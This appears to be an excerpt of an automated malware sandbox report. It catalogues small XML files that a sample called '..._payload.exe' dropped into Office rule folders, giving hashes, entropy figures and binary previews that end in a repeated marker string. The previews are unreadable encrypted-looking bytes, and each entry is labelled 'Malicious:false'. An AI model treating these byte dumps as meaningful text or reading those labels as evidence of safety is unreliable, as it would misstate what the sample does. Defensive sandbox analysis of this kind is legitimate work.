                                                                                                                                                                      Preview:<?xml.Z...j.L.?...x.S.......UY..r....k.Vh...k......[.v.......]a..td.8...~0.du....Ho...d<(...^......_.k.....t-.2d].....[D.........8..}1..\y..<..>....Z..@.]...;...[y.+...V.B.........h*.Y.....m....>.........}.3...P....R$/.....X.rk...xB..y..J._.3..:.5..`x)Yer..\....+<N.z.xZ>.Y.W........l.(..`.....c...W..B_y......9...7l.!"M.?.m.g4....S>(!.n...4c@........M.F..n.../N..........Mj....F...y..r.i.8..Avw*d.m..9U.........c}./.0.G..%...H.+.c.T..C..Y":6....(GI*3.(YV.|.AT..._t~.......{.5cR.....Y.B..&.*....+k..@#U...X3P.........0'2....d...v.{....X@......0z#..q.@.u....$W....t^\6..n`.PAgT..4f...`BX.N@2...1.\....B'9&..=..a-........./.?&.}..;r.1=.;-.& <po<,..5.J.]>.k..a...|...A...o......S...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120623v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):797
                                                                                                                                                                      Entropy (8bit):7.704166356581776
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:+DpQL2VcdAnWS9p7DFGrALp/q9uIUrKnegGztXHkMquSBNFfEPa5SUdNcii9a:2p9VNnWOp7rL9q9uIUrKR7uSBTsSM2bD
                                                                                                                                                                      MD5:BAA0F1A412E01BE39430E6631A14B97F
                                                                                                                                                                      SHA1:65E6364AA5BB24C08B93E40C97DBBAC27C72446E
                                                                                                                                                                      SHA-256:60507482A79855736340B1A992D3D0696FC0237D5327D956AFA65203DAF2D7AE
                                                                                                                                                                      SHA-512:F82EAAAACAEB698D7A9B9C9AFD74D88794E160BB97818D9DE871D3C3521C7A16F13C6ACCF5E5387CD41FA1E433BBED5B69A24C6BC0AD4B71974A40A11A82BCEF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml/Q.........5`.y...z..$V."_.#.$.&..8.p...o..&.m.B.x...U.f.0..xU.K..4.aa....7{....$.C ..W..F.)......N.p..<...8$..A..>....<..#.h..._.w=#.. ...3p...q..i...[.L ..%..wM....|.QN..|$.@.G...q.I.*1..40...........T...H..649...&..f..pt.b..L.].h.]r....K..9R.WUZm.lTe.....IO0..,H.6./._EA.........n..PK.W..AYa%.e9g.^. .C......Ra"E.......D<$$G..+.....N^. .#.7....u.......%.[..lLuc..EE..=.L`..z#..3e%.!Aa.\.l...IR..t.q%..U..v.xM"...AY...1.$.V..9..a<FQ@L$..\...k........is....;0.n.W.50...N.yO.........c.u..`6.n.av........je1@{..,..7.S[t...}Ec}m.K]t.&..G..s.....n&'.....1n>.....1k.7.....:..i^!...l.....S%6Hd..0.j^#..?.^.)..>.....P5re.f=./Q.A.,.a7$.:...%.A.............!.....w...<.K..};..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120624v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):827
                                                                                                                                                                      Entropy (8bit):7.747553501346775
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:5o9UeIfVZmgxnx+O6z69tF7wncO+AeVQ6veWvx72bD:Ze8VZmgxx+O/9oncO+PVVVpoD
                                                                                                                                                                      MD5:23FA9D251950024E0FF740EE6A31EA43
                                                                                                                                                                      SHA1:8E357DDF4743CF913971E7FCAC00CB1C63969D98
                                                                                                                                                                      SHA-256:7B3DCA11F483C4B8550A0D4B5CF4B1A8C7A2A0CD95AD0050FC40334C6BBFFA82
                                                                                                                                                                      SHA-512:F1C4C01735AA7F763EF2F4ECB92047FD16E7B719F78257FF9F4A0CEF25DD76B64DF0331CEDA8FC395603D645F9A36DD08611F4D21F38AA7E103109C48581DD61
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.q.X`r..X`...`.A..T.o....;...q_..)Zs.4...D..)k.."..x^.uo...;.L(GbA>....e..%.... _..Rzw...>4..... !s.&v...#.-.G8...........8.mo.......{;.n.E1..g...P>.JMH........N..y.>..Mi&.......}...{..5....P|.q.p.o6.z.L..Z...#..i..."..r....REW....oi..9<...M....v.1.bG..Kf3....../..#-Y.0..+P=...X..h..d......\E7.......p(..7v."f..B.~...!...*1....A.?h.Y...) ..4..jF;....q.....E.N ^.f..e.kB.p..d.E......#v.p~.93....fA..).g.F.e@..+Tm>.o..by...........5.i....t..U.~.Y~/....<e........Qv.5.O....>p...t..TG..9.09.'....t...Y.^+..X...+.#.Wk.*.mP.#T....u,'....G#.kF..3...a..tH=^k.4..v.e.?S.f...]B..x..E.8e.I..........A.t.N..S.v.Z..&.hkL.$m".@..s...B.7....6....X...:.C..5..j.sMIW..ar.JcI.G....X.&x.9!.98...@ .....`E."..6..s........'h.CF"T.qmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120625v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):752
                                                                                                                                                                      Entropy (8bit):7.696723383970146
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:F4CJuVhWVRvgJ4jhwZ6Q+Ghiffru31jK3RA9NY8egr49M5WSUdNcii9a:F4KtRvgJlZV+tXC31c3sM9MV2bD
                                                                                                                                                                      MD5:6090A455762D40ADD5C45B99BDA1D8D6
                                                                                                                                                                      SHA1:124AAFBE8F3C15706096BC8CC96D7F1081344DD9
                                                                                                                                                                      SHA-256:AEE6DC5FE2A25222100D76CD9C5BCC999E0C00B35C84174DEF966DFA9383EA36
                                                                                                                                                                      SHA-512:66C189623DBFB3AF1D604104A57FD7E1CC7483BA5CC6E520772FC5D250CFAAEC1C3D1FA0E11DC4A9593F47A8918351223685255B0C666DA37C7009F6614E0172
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.}}.|.<j...u$X7.Zx...c.....9]F..w..C..c....EIz.Ti=.>.TU..O...-;.$Z...&..=..Ne`*a.......c....L.U.,)\.;l9".<....BD.{.w..o-PN`..:...%>.Di....%K.....|M.ap..2....]c.v_.mMV.H.Q....!J..yug0.U.;$R.........8nqnT...V..wp.7S.......A..;Z.3...........PZT.T..".~..7\..K..!. (..P..t.tW...P..\....i..0W.]...R.pA....`...F.q..83Y..a..o..$.h...+/....-.!ry.j[..........'...aat.d...y.V.L..V.......=..9. ........]....U.*.g(.zV{.T.`....h=..}.r.oW.H...~k.@L...O%..h....8A?F.J..2..]c*=..f.)...r.VS;..]`...@..Ymy.-...6....H....d.iB3s$....p..z^.c.P..ovV._..p....oe.......e1oz.M?.!.Z.]!G..qk>#..b..J0.7.......aD...Z.rg...f,%hB....A..D5....AP.=..l.<.n...0.u..%r..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120626v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):805
                                                                                                                                                                      Entropy (8bit):7.774692676425296
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:ESKtk8YUVD/zWS2xK7XwEXGY+yhvKHN+NG+zsFXphBO8FzSUdNcii9a:ESKtcqUw0kL+y9hNWXp+2bD
                                                                                                                                                                      MD5:940D45691C58F7848A32E2473E521E90
                                                                                                                                                                      SHA1:5E51B5421B9F6FB6C49F867787B1AFDFB7621ACA
                                                                                                                                                                      SHA-256:86B32084F9CA0FF3D00EB2271C78D3ADC88A79EA1EC0A855BB83D5C0EEA05747
                                                                                                                                                                      SHA-512:8226428F2212E8E2E811F159F441D41921714F8DFE8740452622317F17DB937AF60DF992EF784CB12CD7948C2C356A352BA0A48953AC373D7A7DD119A9944982
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.%....`..........R;..N...0.I.V.t.....!:..}.x.0f/.L...I..c]..h......9.L...B.......&@..Q...A.<.C:..I...dIk...k.9p.,X....u. .A........Ef.............P..\..|x...bnR"V....0..5...^......3..O`.c.#...e.RU..'\h...?w...P.mi...q.d.]..%..+p.K.6....B...A.g+_...0i...?..............B9..v;1.....Q^.....4.........6...Bi.:...H.....+....k..h8.s.i....[1@.6si...%#...."..V.$H.<.R..b......M..w..T!./FJ.'+...K.? ..m..r=........#......kp..-In1$2&..en.q.-.uT..ml...ops.z._.....&..L....=.e...........\b......g..TQ.h...2q.2.5...[.i..p....o:...w.'...|....gJ`$^..Aq5T.]..H...`.w...Yx.-L...f.3...."$ja.8x..[.w&{.X..[}....[..$....T8r..vd0Z..0u..y..L.(.2..._xq:...P.>..x..kW ...v.......f..z..7v.....v'p..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120627v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):737
                                                                                                                                                                      Entropy (8bit):7.720475896973081
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:hhwU02JGBZGEcLG1vXLb99aMIQrS++347jTK9HOvmzTw9WEFSUdNcii9a:hhdbvqfyMOhkjG9HgEc9WEo2bD
                                                                                                                                                                      MD5:48DE20C2215963D7767376D1283EC6EC
                                                                                                                                                                      SHA1:B83C2B1DD6D72ACC3F505873BDB9701174CCAA30
                                                                                                                                                                      SHA-256:0283D299F78A1ED3279223969B4B0C9264A326B78FBBE9374F71300BDDFF7ADA
                                                                                                                                                                      SHA-512:D83F042B39CF5D1E0B9389271625150E2957CB41193AD76A49C5D9EBEFE1F6BF996C907E85CC631C558F1DF97D39A59F14F2CB4AF185BF5BDC766E83081EF3A1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.AKg{../)=....V..o........d.K..P.??# ......y.V...b)ZF....."j.....]...`.hL......&..\..feh.1rF..il...;.ZRV.....U...W.!V......<..?.2.D......(.^'_V..P..c..u.;.L-.X?]f....F.S....oy.~o...$...pbqY....q[n..E.......N ...Y...g..s..t.........%....Df...5oq5...y.....~..v....:.0z...A....\..6........\8"n@.Yzo.x!.GcMg.iZ....7.t..LIZ.F BPs.QX'VC..(1.eW.q...K1-....I......Y|g=n........{......k;.../J.]B..i.yu5...5#.....y.+D.....A.CK.u./...d..R`...v....=$.....U...B..L....f......!.....h..... t.m.zO.......=..wFy.2.b.......J........l.S...B_.............X7z1..C;b.`<.'....U...h.0. .1.v@.v8u....3.2'?..hrg....g..8V%.)~..^.E..........-...iV..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120628v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):801
                                                                                                                                                                      Entropy (8bit):7.751085802133194
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:tsM3ErU/fVl3atu10vRCbiEzJUF5v6QErUVDWPj2bD:tm21V0vRCbXJU3lErqD
                                                                                                                                                                      MD5:AD4A79B528CE590BC776803DE8FC0C3A
                                                                                                                                                                      SHA1:97E0DB3DA451EBC071855FDF1FB2DC73364CF5A3
                                                                                                                                                                      SHA-256:ED3962F2783FC99628609A3F8EC95BBF1910C43085E9BD65B640F07CC614D1D7
                                                                                                                                                                      SHA-512:5E44BA8B685E8B28F62BBF254FC652778A55A2C3B27040DFD84D88BE85D4B49DCD0797EBFE098D17F209882C53E5C850435C697141ED6830E60AB8449E692F3F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmli..R...o..1]...V..(....W1t%V.......1...&>.1e.S.)p}.B=.)..7{.|(........xy....;..;..w...i....).?../<......c7x.n1u/.".D8....PQ.W.R...VW].z...&.jQ.(6.3J.....I&....b\+.j@.0.Jm?.U.'."f..Z..[&w.@...KN.1..k.*ns..%..~i.-...........C T..So!.f..H.u.E.*]..a...F..!.p.C)...h..G...%p*..n30.p....~.3.....%.YW..k.v.. @y..L+.S...W.C;.>....x...V.R.\F.4...U&..N.....>.4.eu...2.c,.Cj.B........[.C...9}..o.....r.a....#.$.;..gs*..w,....g.)d.?...R..c;..B..W.AT.@T..tZ......5.N.N....<I..[......$..@v4.V.O.b.OcY......Yh.|8Px.%un...>.(...H...#..*....\..."N.....h.|..kPUru....Jq>'..6....J[nSvsY......K.s..Y<...A=G...&+.....w.P:......Z.!..S7.h+...u.+[.V.\..R$.`.a...e..t....Z"[..........YWq7g.i.EmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120629v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):761
                                                                                                                                                                      Entropy (8bit):7.702194726886806
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:y6moah0cLaSRouzf26tTQAMHJY1eTswOYdv/YY0mtoBQJxS5snJLVicINGaYTbs8:lmoah0cqi2s3SnTswOYdL3S5snJJiS08
                                                                                                                                                                      MD5:6BFB8CBF23D129B892D0D06B55CD89BC
                                                                                                                                                                      SHA1:EDA48C4C79A85A1FEA928B26054ABDBA4FF7A129
                                                                                                                                                                      SHA-256:1DD6BBFADF70B949D3A180560DB2D785A16D4F2AB85F8420975A9F15E19C2DD1
                                                                                                                                                                      SHA-512:A9CFC94F469054B31A5F8652C0BDBE3B4945C3156A293B8470D641FEA13362AC5AFEA127C04BF7C07F6659FA134FB6AC69D067137030EC33BEDBF2E0B50A3520
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.#V.A..)..%Y.!.....?@B+.......g"....k...w @....-;.\.Q..2MH....>.G.G.u..`...5./...K.`....=...'...]^n.]......(.;.;..s..z.-`z..Q..i...}........V......8..J.."Qo..~.i....[..O....e...m..-..f.`...ok.9.*..a.2.R.D'.}2..(..70.w....:..F....t..0....o.Lct!.A;...M....8T.y.H.KB................2.......]U.;*....x4E"6...Ib7..B..G&\l./..%.#8.a....{t.b............$...'$..K.IX."n..(k..gB2..\:= ..#.t..P.$#\....g.C,......\8....t3S).....R.k...`....].|..(..U.........[...hs.kz..Y....?s.R.G...LaW...w...C..g5.f6.r.Pv..........N.H.X7......P..1..Ft.xv....5w..8..g.H..fo....k...E..V.....}x.k...(Y...b.D...0.".M\.w..w.r..y...kW.....{.A..c.....u......?|..;@n...uQ}s.f..zmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120630v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):832
                                                                                                                                                                      Entropy (8bit):7.742802995677364
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:OHvnI4fdqbf0sDAZLV1pAUSbt1pQMvpDD2bD:OPI4fdpB18JgkkD
                                                                                                                                                                      MD5:A0D3C566502407FC0F53BE35FC2D9D21
                                                                                                                                                                      SHA1:8E979A40AEC7FABD8871A7E01EAF3304690536F7
                                                                                                                                                                      SHA-256:3ACA30C27D2F657FFB4602A9646AEC86E255896B2570B549E74CC330DA001C1E
                                                                                                                                                                      SHA-512:AC673F401FCC2176410DADFB28D223AA3DADC7A33DC6EC276B2D26FC89EFDD63867808FBCC0972C26FF7A8150EB3FE508D8B33C44BA86B1530DB10F67A134592
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...n....Ho....9.=<..=+...z{..+u..c1 .u.6..@.....i.V.FoS.6'.;.j..g....)%.qK[_.{.f.=..V.*...W.S..<u........\_Z$..`D.F.........J...e.4/..j....)TY!X?.M...G...k..p.?....D..l.K...G...`.o...V..9...M.o...0X.S.h=....M.....v..m......f.s...E.#I. ...-.;...:..<.WJ%...e...K..K"...Z`.\Q..kk2#;.P|....F..^f.q.wu.}...{...........c... c.v..UG..E...02..g.].w.|..`.Z0%h...,v..ln|.Fc.../.H...E..C).J...&E~.8...>.........I~../.k..i)O.v._..Q....\P.M... .5........./..LQ.o....w.g...3s.tmL"`......s?/./.%.O....c.%_..J.....~z.F.....C..#.'Xt..?.Bc..Pr.1I...5.IeT..@N...+..Y.*Y....uD}X>..l.B....mK.2bt.....q-.2m..8.....D..Jg....B2.......K..i~....gPBD]n.e.L..-^V.f.......qg6.'.....Iw.x..q`.........;....L..$.X.xg....2.......|.h...XgmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120631v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):748
                                                                                                                                                                      Entropy (8bit):7.702959364643989
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:KyvEpzf/DxneeRFzSijP44AMi7FPRRoxarGpkKiU/P+8XxoL9MjTR9bSUdNcii9a:7Mpzf/BR4ijgTFpRo8+zBP+vYV02bD
                                                                                                                                                                      MD5:1AD7F9E43382A8D09E636BD951F27D89
                                                                                                                                                                      SHA1:E008B142615507805E0AEC4A002093E579CE4ABD
                                                                                                                                                                      SHA-256:EB9151BAA9C927493A8F791952D254E272A0CAB32D174B5E2445BE7979497B29
                                                                                                                                                                      SHA-512:654D506FB14E580DB2C0CA388710CD4F0B661503685A329DCDD104AB375B867A7A0F1CC2A6B6DCA5A6A0B61AB1A60B4827089BCD31960F4FB2332542E2735AFC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.Pn.C6.-...V.|.V.8.m|.U....p..LdO\.G.,B+v....|.V....7.N...t....G.. /=S.G..c*..x..J..Q.].s..S..X.q..V.53C. .&....z.D.w~.k.ve.o.'........!~.7....?A...Hh.QN#ap!U1+C.#.q..~.6...d+...V..S...O..~......o]..)d...@.B...TI....\..{.v.G}.u)'/..&..,....|J...8.hY.FY...wT/4a}.z...2.Q.T.?.Z..g..........w.....6...d...h.m?.)D...2...+.n..`.^.../.......^....i..i..er.k....%.86..`Y.J.......Y.<.....$d.b..@.E...#...W...3....L..((.f.F.k.f.B|>L.....J..\.H.BQ.}.Fx*...^~.?.8.7..s......$j.(..,.Z-.D.P....{....C..P#....s......m....A}....)0Tq......+..$.............S\....d.".M....{F.W.....-..b..6.o....$......kO......;..E.$..5..D....?....| ..9E.Z0.......6....7gK...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120632v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):804
                                                                                                                                                                      Entropy (8bit):7.724369035303616
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:wdAYQJx0ZIneAx6iIDNrVtJYH9kJ/l8PI0sLLqAIV0cKZ1FXV1RPDt2+UQYgwSSw:wdvsbx6xNrqdg50gDIV0xl/S5h2bD
                                                                                                                                                                      MD5:283DBCCA68D43FB815090FF301B113E4
                                                                                                                                                                      SHA1:B72DECAEE70793665E700EE50DF6B6C7C4DE9617
                                                                                                                                                                      SHA-256:46FCA7EEF883197A1FD21064F5CB6E88761F85223BF3CF9A3B7B32E8C524F832
                                                                                                                                                                      SHA-512:91E0C91EDD8A1C7BED4F82D105E62785CD3C673F92651D4416E2270161F87EF94643CD14D36C787D93E280FC40920617E771E375A33A33C7A56F7ABFF0D7EC05
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlWs/I=.m..L..V.....U.....K..].W..s...=..~.d.qT...,...D....)..6..t+o...*.....Zt.D...O..=0S:....{..I...%.>h!.[..K.?.(....0.....c5.5.....MO...%>.?,...Mqk.iez.b...^\.Z..3_...d.L.l.90....:.#|..wC.....P.?.A...(.W.0mF..D.z.g~.1..8.3...(..F....O.Z*#..+#Q...d{.(A,.,.$.f.{...........]..C.......xd.A)..at...F'.........LZ.l#.xd.v..5......b;.`..e.k(...G.e.2S.V..S.L:'..8.a.^P...<L...mTDH..,l...8.....y ....{.D.~V....i_.....[;.,?(....(I....P...c...f.H%.....g..7}..r.h.>>z.....!..5..9;...tmD(M...D....R...k.....i3.=..v+.Q.^....6V.....h..5.......w.u.....2i....6Dpn..'z.v.Y.Y[_'.~....2*j.u<Y.~0.....lq.1"..e.).W..m.aR...f#.S".....~...a...8.`@V...=E.7+...n.5.FEn..H.5zc.iE%C....&...5.....j}.....J~.2.....%.oCT.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120633v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):752
                                                                                                                                                                      Entropy (8bit):7.7169061458968855
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:f3LpCtpmZ7pJ0dDicgPg2AbLf/zfR21mbekEtIFxX0MjNybO/SASaRubVZUSUdNX:DstpAMDicgPhu/rR9bwtIFFXjNrSLpZk
                                                                                                                                                                      MD5:687F7287619D68A3D4280720ED9DB0B6
                                                                                                                                                                      SHA1:631FA5AFC8F71196531C33799CB6C38DD26F10EA
                                                                                                                                                                      SHA-256:E6F8B427AB34E97F08363AE862B7CB3A7DF6250C3650E6938EBA5C0F11BC47F1
                                                                                                                                                                      SHA-512:CAD991F14278135CA3E75B4D0B2D8BF41CEF4712080F01A585785B014B4A73FCAFF5DECBE258059FAEA085D095B14AC3479662DF908D340584A7FCBC9E09AFD8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.d..|kn.*.?.......(X|.R{C...g.....9"2lu\|a.P...k.g...m....=.#..tr.?.^.{.....n..4....(.Y.:...........J.#.X}.+.b..........o.._.,...U../.2.....~...!..*y..*8cL=.yI..z...(.Y.o....i'.<.A7/A./...J.[X)..../2.Rb."........X1..9.#b...m:...D....q...A.~...|..S....R......N.............y.jr}.@.^..q11!.u.>8<k.M.w.[.......u....m.2...y.^.3". ..?...5...<.....B..C....cL^T.j......v].<@.#1.-O...X..i.*0.9.i........Gu.Q....^m.V...5!&y..5.V...lo..<..76....M\.6...8....*.....2.[...*k-...-D.&.....w.. hW.C..y...*....j.a..7.>`....Q....W.T.D.....,.[FR._)...*8.AO.. H...]..e.......,9I.0 ..3|.R^j..8j..V......2..n KvW<..gG,k...{..........F.l..^v...x;Y=.....Y{AmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120634v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):827
                                                                                                                                                                      Entropy (8bit):7.760638050846478
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:T6z0BMGbVv8QvajJleoUnb80nvqMbmM2bD:T6pGbVqjJleZb8GyJD
                                                                                                                                                                      MD5:4C770D0162F94E40A67E8E5D7B640105
                                                                                                                                                                      SHA1:B7F7C48FD8A7EEBCE148F77F003AD636837D121B
                                                                                                                                                                      SHA-256:BF7F18B9F33C108FCA6D8D444C9DC1E0EF2375A0A6EB28F861CE0E21DEC42645
                                                                                                                                                                      SHA-512:3EA96B9744B4B32BF1D17945FCA97E087B67F8433CEBDCC4922AB71B1C911B1B884F359A07CBA00C3F0B6C8E00F563EBE0D48F1B9EFC9778CE2B89F2F659ABF1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmll...F...6...E.wl..........L .k..G..[..JJ..2s.a.f..c.....#._..},.K.8..C......-.L..duy...U..|> .O@.V.....aU.Hh=..............cv.[<..t...-J...G38..../.....J'...b..p...#}.y....)[..B.#...._....../..xx.z....p..n.#..o.*.e.......{....v/..`..1..D.8w.o....:..!....k\...WcE.D....`3.x.....Xg.am0.'...!.W.N...8....s...>....V..t.6../}.u.Y%..o#vkG...R..]..!.Wa.[......7Rb.;.c.H_K.4...=.....lB..[.....r.,X]"/..D...`.<=....I..K....Q..........u(a].-..|..3..........X.b.Q........(~Z...<.....e....IP.....3.0vwP......?...$...HV....{.....+.qb...<...^.....Q.....xi.fO#..W..d5.x/.}.d.t..$...<...6.."..t......^.~n..G..... {.V.T..<...D<.....F"-......5..F:R./.y...6.... D.\... ~...?7..b..}..%@.M.u.P..O.{0..J.dO....T.".9>....Y'.1..DmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120635v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):753
                                                                                                                                                                      Entropy (8bit):7.684793122605307
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:QCUb/Gp8SJl8OiEPNVn9eOoZcVzF0iA3sdJzBi/HlN8/QZ8KInsTcASUdNcii9a:DwGeQnnOZcVCGJL/QZpgss2bD
                                                                                                                                                                      MD5:021632C419D1F3792FCE862318F13874
                                                                                                                                                                      SHA1:7B0652329E24D9A8DB70393F3E5B1559F9D9D998
                                                                                                                                                                      SHA-256:EE58A3BA277916128E8EA34B9037F4F70438E4ECFC9309C3DBF4605930C311B5
                                                                                                                                                                      SHA-512:B0A074961D5DF76B10676149A1E08F8DF76312B6FC58B9115916216C17C7D5823315D974C57D2C738560FFED0E149D995E0FEBE4EBB5B42833BC6AA8A66D9E8E
                                                                                                                                                                      Malicious:false
